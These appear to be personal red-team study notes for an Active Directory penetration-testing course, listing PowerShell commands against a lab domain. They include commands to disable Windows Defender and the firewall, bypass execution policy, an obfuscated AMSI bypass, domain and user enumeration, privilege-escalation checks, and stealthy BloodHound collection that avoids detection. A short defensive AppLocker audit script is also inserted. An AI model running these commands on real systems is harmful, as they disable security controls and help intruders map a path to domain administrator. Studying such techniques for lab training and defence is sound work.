
Commands

RunAs

runas /user:chichocorp.local\mrdesdes powershell.exe

Execution Policy

powershell -ep bypass

Disable Windows Defender

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true

Disable Firewall

netsh advfirewall set allprofiles state off

AppLocker

PS C:\> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\> Get-AppLockerPolicy -Effective

Version RuleCollections RuleCollectionTypes
------- --------------- -------------------
      1 {0, 0, 0, 0...} {Appx, Dll, Exe, Msi...}

PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections


PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 38a711c4-c0b8-46ee-98cf-c9636366548e
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 8a64fa2c-8c17-415a-8505-44fc7d7810ad
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%PROGRAMFILES%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 06dce67b-934c-454f-a263-2515c8796a5d
Name                : (Default Rule) All scripts located in the Program Files folder
Description         : Allows members of the Everyone group to run scripts that are located in the Program Files folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%WINDIR%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 9428c672-5fc3-47f4-808a-a0011f36dd2c
Name                : (Default Rule) All scripts located in the Windows folder
Description         : Allows members of the Everyone group to run scripts that are located in the Windows folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow
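
A defender-side check, added here and not part of the original notes: it reads the same effective policy the commands above display, reports whether the session is actually in ConstrainedLanguage mode, and flags the default path rules that allow Everyone (S-1-1-0) so they can be replaced with tighter publisher or hash rules. The AppLocker module and cmdlets are real; the script and its thresholds are my own assumption, not CRTP material.

```powershell
# Added example, not part of the original notes: audit the effective AppLocker
# policy for the broad default path rules shown above and report the PowerShell
# language mode. Assumes the AppLocker module is available (Windows 10 / Server
# 2016 or later) and that the caller can read the effective policy.
Import-Module AppLocker -ErrorAction Stop

$languageMode = $ExecutionContext.SessionState.LanguageMode
if ($languageMode -ne 'ConstrainedLanguage') {
    Write-Warning "PowerShell is running in $languageMode mode; AppLocker is not constraining this session."
}

# Default rules grant Everyone (S-1-1-0) execution under these two variables.
$broadPaths = @('%WINDIR%\*', '%PROGRAMFILES%\*')

$policy = Get-AppLockerPolicy -Effective
foreach ($collection in $policy.RuleCollections) {
    foreach ($rule in $collection) {
        # Only Allow rules that carry path conditions are of interest here;
        # publisher and hash rules have no PathConditions property.
        if ($rule.Action -ne 'Allow' -or -not $rule.PSObject.Properties['PathConditions']) { continue }
        foreach ($condition in $rule.PathConditions) {
            if ($broadPaths -contains $condition.Path -and $rule.UserOrGroupSid -eq 'S-1-1-0') {
                [pscustomobject]@{
                    Collection = $collection.RuleCollectionType
                    RuleId     = $rule.Id
                    RuleName   = $rule.Name
                    Path       = $condition.Path
                    Advice     = 'Broad default Allow rule for Everyone; prefer publisher or hash rules'
                }
            }
        }
    }
}
```

Run it from an elevated session on the host being reviewed; the objects it emits can be piped to Export-Csv for a baseline comparison across machines.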

AMSI Bypass

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Import RSAT

PS C:\AD\Tools\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools\ADModule-master> cd .\ActiveDirectory\
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1

Log in to a PC

Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator

Domain Enumeration

# Getting domain information (computer objects)
Get-DomainComputer -Domain chichocorp.local

# Getting trusts
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

Get-ADTrust
Get-ADTrust -Identity chichocorp.local

# Getting the forest
Get-Forest
Get-Forest -Forest chichocorp.local

# Getting all global catalogs of the forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local

# Get Forest Domain
Get-ForestDomain
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
Get-ForestDomain -Forest chichocorp.local | %{Get-DomainTrust -Domain $_.Name}

# Get domain policy for the current domain
(Get-DomainPolicyData).systemaccess
(Get-DomainPolicyData -Domain chichocorp.local).systemaccess

# Get domain controllers for the current domain
Get-DomainController -Domain chichocorp.local

# Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identity mrdesdes

# Get list of all properties for users in the current domain
Get-DomainUser -Identity mrdesdes -Properties *
Get-DomainUser -Properties samaccountname,logonCount

# Search for a particular string in a user's attributes:
Get-DomainUser -LDAPFilter "Description=*password*" | Select name,Description

# Get a list of computers in the current domain
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -OperatingSystem "*Server*" | select name,operatingsystem
Get-DomainComputer -ping
Get-DomainComputer -ping | select Name

# Get all the groups in the current domain
Get-DomainGroup | select Name
Get-DomainGroup -Domain chichocorp.local

# Get all groups containing the word "admin" in group name
Get-DomainGroup *admin*
Get-DomainGroup *admin* | select Name

# Get all the members of the Domain Admins group
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberName

# Get the group membership for a user
Get-DomainGroup -UserName "mrdesdes"

# List all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName desktop-828ljno

# Get members of the local group "Administrators" on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroupMember -ComputerName desktop-828ljno -GroupName Administrators

# Get actively logged users on a computer (needs local admin rights on the target)
Get-NetLoggedon -ComputerName desktop-828ljno
Get-NetLoggedon -ComputerName desktop-828ljno | select UserName

# Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName desktop-828ljno

# Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName desktop-828ljno

# Find shares on hosts in current domain
Invoke-ShareFinder -Verbose

# Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose

# Get all fileservers of the domain
Get-NetFileServer

GPOs

# Get list of GPO in current domain
Get-DomainGPO
Get-DomainGPO -ComputerIdentity desktop-828ljno

# Get GPO(s) which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

# Get users which are in a local group of a machine using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity desktop-828ljno

# Get machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity mrdesdes -Verbose

# Get OUs in a domain
Get-DomainOU

# Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU
Get-DomainGPO -Identity "{6AC1786C-016F-11D2-945F-00C04fB984F9}"

ACLs

# Get the ACLs associated with the specified object
Get-DomainObjectAcl -SamAccountName mrdesdes -ResolveGUIDs

# Get the ACLs associated with the specified prefix to be used for search
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=chichocorp,DC=local" -ResolveGUIDs -Verbose

# We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=chichocorp,DC=local').Access  # This didn't work for me xd

# Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs

# Get the ACLs associated with the specified path
Get-PathAcl -Path "\\chichocorp.local\sysvol"
Get-PathAcl -Path "\\desktop-828ljno.chichocorp.local\c$"

Trusts

# Get a list of all domain trusts for the current domain
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

# Get all domains in the current forest
Get-ForestDomain
Get-ForestDomain -Forest chichocorp.local
(Get-ADForest).Domains

# Get all global catalogs for the current forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest (no Forest trusts in the lab)
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local

User Hunting

# Find all machines on the current domain where the current user has local admin access.
# This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then uses multi-threaded Invoke-CheckLocalAdminAccess on each machine.
Find-LocalAdminAccess -Verbose

# Find computers where a domain admin (or specified user/group) has sessions
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"

# Find computers where a domain admin session is available and current user has admin access (uses Test-AdminAccess)
Find-DomainUserLocation -CheckAccess

# Find computers (File Servers and Distributed File servers) where a domain admin session is available.
Find-DomainUserLocation -Stealth

# List sessions on remote machines (https://github.com/Leo4j/InvokeSessionHunter)
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -NoPortScan -Targets C:\AD\Tools\servers.txt

Privilege Escalation - Local

# Get services with unquoted paths and a space in their name
Get-UnquotedService -Verbose

# Get services where the current user can write to its binary path or change arguments to the binary
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration the current user can modify
Get-ModifiableService -Verbose

# Run all checks from PowerUp
Invoke-AllChecks

Feature Abuse

Jenkins - lab

BloodHound

  • Provides a graphical user interface over the AD entities and relationships collected by its ingestors.

  • Uses graph theory to map the shortest path to interesting targets such as Domain Admins.

  • Ships with built-in queries for frequently used actions.

  • Also supports custom Cypher queries.

# Import SharpHound
. .\SharpHound.ps1

# Run all collection methods
Invoke-BloodHound -CollectionMethod All
SharpHound.exe -c All

# To make BloodHound collection stealthy
Invoke-BloodHound -Stealth
SharpHound.exe --stealth

# To avoid detections like MDI
Invoke-BloodHound -ExcludeDCs

Install BloodHound (Parrot)

BUT: make one change to the installation steps, replacing the following command:

echo 'deb https://debian.neo4j.com stable 4' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null

with:

echo 'deb https://debian.neo4j.com stable latest' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null

After importing the .zip into BloodHound, it should end up looking like this:

Last updated 1 year ago